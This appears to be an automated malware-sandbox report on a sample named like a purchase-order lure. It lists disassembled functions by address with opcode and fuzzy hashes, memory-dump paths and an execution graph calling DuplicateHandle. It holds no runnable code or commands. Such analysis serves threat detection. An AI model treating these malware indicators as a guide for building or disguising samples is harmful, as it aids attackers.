                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19db4e47f43e72318c6886f01461561ad4e7e2be6db65915d5ed037ed76c5656
                                                  • Instruction ID: 48621bfec53661156ee2d9305882fc01a0822e191d681e5bc80caec4aae6e46e
                                                  • Opcode Fuzzy Hash: 19db4e47f43e72318c6886f01461561ad4e7e2be6db65915d5ed037ed76c5656
                                                  • Instruction Fuzzy Hash: A4011634A44208DFDB44DFA9D598AACBBF5EB49605F249094D5099B351C734DE40EB80
                                                  Function 06E13680 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f9f1692137bea18f4ea210a08787fe74ff113276fa5ec445102455ab46c0752
                                                  • Instruction ID: 56d4b0ebbcc360e98d704cd96ecb6cae7942bf53009138950fcbf441c26aec87
                                                  • Opcode Fuzzy Hash: 8f9f1692137bea18f4ea210a08787fe74ff113276fa5ec445102455ab46c0752
                                                  • Instruction Fuzzy Hash: 61018131A1072E8BCF15EB68D8144DDB7B5FF88310F408525D95677244EF746A198BE1
                                                  Function 06E13670 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d88d984de5af7a8e520e5948333212233c87fb2e4c445feb9e76f3f26f7a1ce8
                                                  • Instruction ID: 2a29dded6b5384a52e79cdf320eeb1c511566f3f9113cd18be8af1b2eb5425ad
                                                  • Opcode Fuzzy Hash: d88d984de5af7a8e520e5948333212233c87fb2e4c445feb9e76f3f26f7a1ce8
                                                  • Instruction Fuzzy Hash: 39F02231A043188BCF16AB68C8150DCB7B1EF4A310B01C5A6CDC1BB240FF305A18C3E1
                                                  Function 06E14649 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51d4703fb220a14fe4061a5c43499fb4510ee4220c1bb913cf1d228ba36dc201
                                                  • Instruction ID: 0a640baf94c7b8d9c5c8d52a122931d88c61b9f59cab91e20f51b591d0a8ef87
                                                  • Opcode Fuzzy Hash: 51d4703fb220a14fe4061a5c43499fb4510ee4220c1bb913cf1d228ba36dc201
                                                  • Instruction Fuzzy Hash: 5DF09636300304AFC3556FA9E844E567BA9EFD5721B14843EE595CB380DA31C945DB60
                                                  Function 06E1D810 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8f8c2d2385ded8ba38ee11ac680cf4d3b696cc67d3b958dd43dfb2671dc8aa2
                                                  • Instruction ID: 7e4c353547c98377ed88cb386412cc83d567f510c6baec98bbddefc6f66600e0
                                                  • Opcode Fuzzy Hash: b8f8c2d2385ded8ba38ee11ac680cf4d3b696cc67d3b958dd43dfb2671dc8aa2
                                                  • Instruction Fuzzy Hash: EE01A974D012499FCB40DFA8C940AAEBBF5BF48301F50819AE954E7341D7349A40DB91
                                                  Function 0100D744 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2047466175.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_100d000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9fd3666c20cab77f873bd2530f3f8f5cc354ac43bb0820834903b4b4e537a644
                                                  • Instruction ID: dba1131e9494b5a4b3293edf1fd034f6463698d224f760fd2fb7e3a10e5d00ea
                                                  • Opcode Fuzzy Hash: 9fd3666c20cab77f873bd2530f3f8f5cc354ac43bb0820834903b4b4e537a644
                                                  • Instruction Fuzzy Hash: 43F062714043849AF7118E5AD888B66FFD8EF85634F18C49AED4C5A286D3799844CBB1
                                                  Function 06E136F0 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 22e88f87f41c0d9cef3998a32386148fc9d107ea752373b1112bbcafe3621807
                                                  • Instruction ID: f536a7b35d14e39cb69f246d306308d91a294cffa584275a19dffcfcab44bd77
                                                  • Opcode Fuzzy Hash: 22e88f87f41c0d9cef3998a32386148fc9d107ea752373b1112bbcafe3621807
                                                  • Instruction Fuzzy Hash: 2EF0E235B04340CFC724AF2EA98449ABBAAFFDA710714417FD545DB260EF31D805C2A1
                                                  Function 06E1DFBF Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7dcc9b947ab10bca7c0bc11f60ed6cf4992d9d2dfa77381d049ad66d87130d85
                                                  • Instruction ID: 9e51dca8f2e70648474d6862f9641cd01155d09e657f48d0958632598db69a57
                                                  • Opcode Fuzzy Hash: 7dcc9b947ab10bca7c0bc11f60ed6cf4992d9d2dfa77381d049ad66d87130d85
                                                  • Instruction Fuzzy Hash: 49F059309093448FE7C19F69D804BE9BBBF9F89300F005062E9049B366DE340A4EC7A1
                                                  Function 06E1F45F Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ef72d6b3508c052b6d5ba745e047ffd1d0d566b2db89d73149a4355fe6d4464
                                                  • Instruction ID: 023e3ed4ef2837de5378c4d37e78fb12950ec420f207d69eae84627af8ed2a3b
                                                  • Opcode Fuzzy Hash: 3ef72d6b3508c052b6d5ba745e047ffd1d0d566b2db89d73149a4355fe6d4464
                                                  • Instruction Fuzzy Hash: A0F06734D0A38CAFCB26EFA9E91468DBFB5AF49300F0080AAE95497381D6745B54DB91
                                                  Function 06E1C0AD Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 404130d011e5745c7e45d4692bdc2648e8a3c86450db53b649c41ed81800bcd5
                                                  • Instruction ID: a05d586501aada5f9174fb6bad59ddd134962a13aab2abf4d0e54602938774bf
                                                  • Opcode Fuzzy Hash: 404130d011e5745c7e45d4692bdc2648e8a3c86450db53b649c41ed81800bcd5
                                                  • Instruction Fuzzy Hash: 30016C78A00329DFCBA4CF64D980BA9BBB2BB09200F1051EAE949A7311D7319E80DF11
                                                  Function 06E1E1F2 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb98b3524974c40bd0df2aa98057763e871ce4d4265c9f6315d9a2d0182ee9b7
                                                  • Instruction ID: 7829d40402bcd4c12328ba7eac62e65b967ed9456e8cd43da4c573dc9adc7dc9
                                                  • Opcode Fuzzy Hash: bb98b3524974c40bd0df2aa98057763e871ce4d4265c9f6315d9a2d0182ee9b7
                                                  • Instruction Fuzzy Hash: 9DF09074D04244CFDB40DF98D148AACBBF6FB08301F109526E9169F399D7349945CF00
                                                  Function 06E1CB1F Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b89a76cdea2530a00770632931de2b2ba279928ef288f0fcab235817594668e6
                                                  • Instruction ID: 77ebb8c615673c6d6d4b7fbfb268a710c72a951242a672405e8d2f8f362d07a0
                                                  • Opcode Fuzzy Hash: b89a76cdea2530a00770632931de2b2ba279928ef288f0fcab235817594668e6
                                                  • Instruction Fuzzy Hash: 67F03975D51215DFD780DF79C846B8ABBF0EF08A00F219869D029EB310E77496028BD5
                                                  Function 06E1DFD0 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6133e6cfbe6385d526bf488b4e805a4ce4dd6c4e044a6f0a9b809b9172ad9eaa
                                                  • Instruction ID: 1e0022a557690a332a241340eed588a5219bf54c498580da0ea03638db958c5a
                                                  • Opcode Fuzzy Hash: 6133e6cfbe6385d526bf488b4e805a4ce4dd6c4e044a6f0a9b809b9172ad9eaa
                                                  • Instruction Fuzzy Hash: 4EF0E5304042048FEB90DB6ED804BE8BBBEAF8C300F00A031A5059A369DF74554AD7A1
                                                  Function 06E1F470 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f93af53303473c4407b9270ead42a57535151d99182f1b55fdd154cb24c8b44
                                                  • Instruction ID: 8a0db69a9d880a3a36a4367e381b8fcc7248079ae85d162c11e8857f5f29dd93
                                                  • Opcode Fuzzy Hash: 6f93af53303473c4407b9270ead42a57535151d99182f1b55fdd154cb24c8b44
                                                  • Instruction Fuzzy Hash: F4F03978E0020CEFCB55EFA9D50868DBBF1FB48301F00C0A9E918A7340DA745A50EF91
                                                  Function 06E1E52D Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50576b5e05469550061cb1167aaa6e4cfad2b9e86d27c56d89d3458a6f00d4c4
                                                  • Instruction ID: 6685eb45e1e90dde312c11b65d832936163becac801fa96caaea0ab4182d75bf
                                                  • Opcode Fuzzy Hash: 50576b5e05469550061cb1167aaa6e4cfad2b9e86d27c56d89d3458a6f00d4c4
                                                  • Instruction Fuzzy Hash: 44F08C349053099FCB44DF98D5484ACBBFBFB48301B105126D64AAF368DB308901CF40
                                                  Function 06E1C381 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 126ae97125d3e9b55e8d2f2aa82ba56f95ad56a1678de16426162b50944afed6
                                                  • Instruction ID: f6967619ba9c4534188bcc218be02747f8fb645893abf9f17a08a269c0e5f3d5
                                                  • Opcode Fuzzy Hash: 126ae97125d3e9b55e8d2f2aa82ba56f95ad56a1678de16426162b50944afed6
                                                  • Instruction Fuzzy Hash: BBE0CA70D00248CFEBA0EFE4D488B8CBBB2FB08304F205099D515AB688C7305980EF50
                                                  Function 06E1E339 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e5c9fc6404e604b65b939375dc18be9a9ba1632a2287689961e0d0c865467b0
                                                  • Instruction ID: b4f2e0763a68ff4a488b1a012cd73d97552bbb5c2e40dad0eb2bbadcd253d1b2
                                                  • Opcode Fuzzy Hash: 2e5c9fc6404e604b65b939375dc18be9a9ba1632a2287689961e0d0c865467b0
                                                  • Instruction Fuzzy Hash: 85E04630A44209CFC744DF99E544AEC7BBAFB84300B01AA20A6069B729DBB0590A8B81
                                                  Function 06E1CB30 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e310682ba8797055142a49cae8ac1c753b99298ffaecaa4d262dd7ec73da4883
                                                  • Instruction ID: 584dbc1aacd8ccd0bdab811006b09901c63ad2cb652d4ca9fe72f4bbcc717b79
                                                  • Opcode Fuzzy Hash: e310682ba8797055142a49cae8ac1c753b99298ffaecaa4d262dd7ec73da4883
                                                  • Instruction Fuzzy Hash: D4E0BFB0D40719DFD780DF79C545A5EBBF0BF08A00F218965D015E7215E77496048F95
                                                  Function 06E1E6F2 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bec0b9b3ec4a5bd4761d147fec6789af6362961b164be545389f95c3ed35ab7
                                                  • Instruction ID: 53b2ed48178ed15bfe122844ae8ef742c97d72e83d4856c3ce25e30c827a8b40
                                                  • Opcode Fuzzy Hash: 0bec0b9b3ec4a5bd4761d147fec6789af6362961b164be545389f95c3ed35ab7
                                                  • Instruction Fuzzy Hash: 67E08C30805246CFD700DFA8D048A98FBF2FF04305B08E0A6E8098F2A6D3389A80EF40
                                                  Function 06E1A683 Relevance: .0, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9206e5c61d91013ef59d01a7373052af2f8962d1eebe2163b2b9439aa12cae6c
                                                  • Instruction ID: 25722c19e8f2a3bd2b7536fd9cc39554d7477b9643a30f555f768794303198e7
                                                  • Opcode Fuzzy Hash: 9206e5c61d91013ef59d01a7373052af2f8962d1eebe2163b2b9439aa12cae6c
                                                  • Instruction Fuzzy Hash: 90D05230946248CFCB20CF18F940BECBB3AFB84220F0012E1D10C92219CB311E88CE80
                                                  Function 06E1A2D0 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8bc5f43bd586e7888fcd03aa78bef46f3ed86417ccddebe03bb14a110e695e18
                                                  • Instruction ID: 50c2abcc115bde72170ea22190b5cc0126e172dd81dece90bd51052557948bc0
                                                  • Opcode Fuzzy Hash: 8bc5f43bd586e7888fcd03aa78bef46f3ed86417ccddebe03bb14a110e695e18
                                                  • Instruction Fuzzy Hash: B2D0C93000A748CAC2219F59B5583AA77A5AF42309F6518A9AA880616287B655A4C656
                                                  Function 06E1C176 Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5946103209f47d421a3c51cd4bd5d21ac16e9e6cbea1311b65de741282d521e
                                                  • Instruction ID: 8c701c0e3f80b014d3a2e711ef2a2469040608c093cf70ef0d50c9961b5b5917
                                                  • Opcode Fuzzy Hash: e5946103209f47d421a3c51cd4bd5d21ac16e9e6cbea1311b65de741282d521e
                                                  • Instruction Fuzzy Hash: 31D05E3010C210DFC7406F60C4589A17776FF0A302B2011E1C90EAF216C736CC89DFA0
                                                  Function 06E1A260 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ae994ddeef186b503b8a38c554c387d5d84b21ee90672c0b778ece9ec833497d
                                                  • Instruction ID: 463b0e5004446eb593d6120c1c125167f78f3d45ed8a5f83c5024e5a3f441430
                                                  • Opcode Fuzzy Hash: ae994ddeef186b503b8a38c554c387d5d84b21ee90672c0b778ece9ec833497d
                                                  • Instruction Fuzzy Hash: 20C02B30043B048BC3142BF9F50C334377B6F1130BF401020E30D452218FB14110D6A1
                                                  Function 06E1565C Relevance: .0, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1690ff328b7f244c483cf4d43883052450b72b7050bbbf95ced05f146b3fa260
                                                  • Instruction ID: 28ca54dc32b3e3af0359da22441fec556e499d5e25fdec90f4eb91b016891fcf
                                                  • Opcode Fuzzy Hash: 1690ff328b7f244c483cf4d43883052450b72b7050bbbf95ced05f146b3fa260
                                                  • Instruction Fuzzy Hash: 9FB012765D5305E5B5846264CE50DAB9600FFB6B81F00DD153356A00508570C539F1BB

                                                  Non-executed Functions

                                                  Function 06E1E7C3 Relevance: .3, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e384084c0cbab6e9ec301d013bb4be3a27c962691c0bb19ded6c85cb07735e02
                                                  • Instruction ID: f6874f141e7a53bdc21e1a465c78b420db9991402c135a78852798c7422483b1
                                                  • Opcode Fuzzy Hash: e384084c0cbab6e9ec301d013bb4be3a27c962691c0bb19ded6c85cb07735e02
                                                  • Instruction Fuzzy Hash: 63E12E74E002198FCB54DFA9C5809AEFBF2FF89305F248169E815AB356D731A941CFA1
                                                  Function 06E1F038 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b711a796cbd52d8134185a10bf0512d64eda61da4ffc61f8a9c0014875fac999
                                                  • Instruction ID: cdf22cf5a27486eebead93fcba1c720edfb390d61cc658c48f41437f9722bcf9
                                                  • Opcode Fuzzy Hash: b711a796cbd52d8134185a10bf0512d64eda61da4ffc61f8a9c0014875fac999
                                                  • Instruction Fuzzy Hash: 41E11974E002598FCB14DFA9C5809AEFBF2FF89305F249169D414AB356DB31A942CFA1
                                                  Function 06E1EC00 Relevance: .3, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd3307cd00dc33a8a3cc2b946482ef4028951ca5202c7cd15269e9beb65f7f56
                                                  • Instruction ID: fb94982ff1044331e3d0fdb013e2dbf05cc20e803168f36d7a675733020a063c
                                                  • Opcode Fuzzy Hash: cd3307cd00dc33a8a3cc2b946482ef4028951ca5202c7cd15269e9beb65f7f56
                                                  • Instruction Fuzzy Hash: 90E12E74E002598FDB14DFA9C5809AEFBF2FF89305F249159E814AB356D731A941CFA0
                                                  Function 010EF044 Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52abf8aa3dc6982e11379938229b9d9744b0c0050687084e0918d57a857fbb42
                                                  • Instruction ID: 74bce5fd2877f46a42d5ea6ed72203a22bb9b5cd4641e14b5e8773a0453cd122
                                                  • Opcode Fuzzy Hash: 52abf8aa3dc6982e11379938229b9d9744b0c0050687084e0918d57a857fbb42
                                                  • Instruction Fuzzy Hash: 86A18E36E0021A8FCF19DFB5C8485DEBBF2FF84300B1585AAE945AB265DB71E945CB40
                                                  Function 06E1EBFF Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5395dd388b2b23e39848a85cbfec80ab6fa9fcfafbf35bb92298eb09814436eb
                                                  • Instruction ID: a1ef025ee0cd53d3fb7b64823aff767d4891361c97647e51b7cbde6f4e6fd070
                                                  • Opcode Fuzzy Hash: 5395dd388b2b23e39848a85cbfec80ab6fa9fcfafbf35bb92298eb09814436eb
                                                  • Instruction Fuzzy Hash: 6551EA74E012198BDB14DFA9C5805AEFBF2FF89305F248169D418AB356D7319A42CFA1

                                                  Execution Graph

                                                  Execution Coverage:6.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:17
                                                  Total number of Limit Nodes:0
                                                  execution_graph 19385 6723b78 19386 6723b7e GlobalMemoryStatusEx 19385->19386 19388 6723bee 19386->19388 19389 136b4c8 19390 136b50e 19389->19390 19394 136b697 19390->19394 19401 136b6a8 19390->19401 19391 136b5fb 19395 136b71a DuplicateHandle 19394->19395 19396 136b69b 19394->19396 19400 136b7a6 19395->19400 19405 136b27c 19396->19405 19400->19391 19402 136b6a9 19401->19402 19403 136b27c DuplicateHandle 19402->19403 19404 136b6d6 19403->19404 19404->19391 19406 136b710 DuplicateHandle 19405->19406 19408 136b6d6 19406->19408 19408->19391

                                                  Executed Functions

                                                  Function 0136B697 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1198 136b697-136b699 1199 136b71a-136b71b 1198->1199 1200 136b69b-136b6a2 1198->1200 1201 136b750-136b7a4 DuplicateHandle 1199->1201 1202 136b71d-136b74f 1199->1202 1203 136b6a4 1200->1203 1204 136b6a9-136b6d1 call 136b27c 1200->1204 1206 136b7a6-136b7ac 1201->1206 1207 136b7ad-136b7ca 1201->1207 1202->1201 1203->1204 1208 136b6d6-136b6fc 1204->1208 1206->1207
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0136B6D6,?,?,?,?,?), ref: 0136B797
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3265773483.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1360000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 3acf2d23e084078974018570b169bdc8150d350acff65b6565d11a4c3bcb56c6
                                                  • Instruction ID: b79421b9e12c9ebff79e361d0d060c07991e9ec4872d733da322d8ad53830338
                                                  • Opcode Fuzzy Hash: 3acf2d23e084078974018570b169bdc8150d350acff65b6565d11a4c3bcb56c6
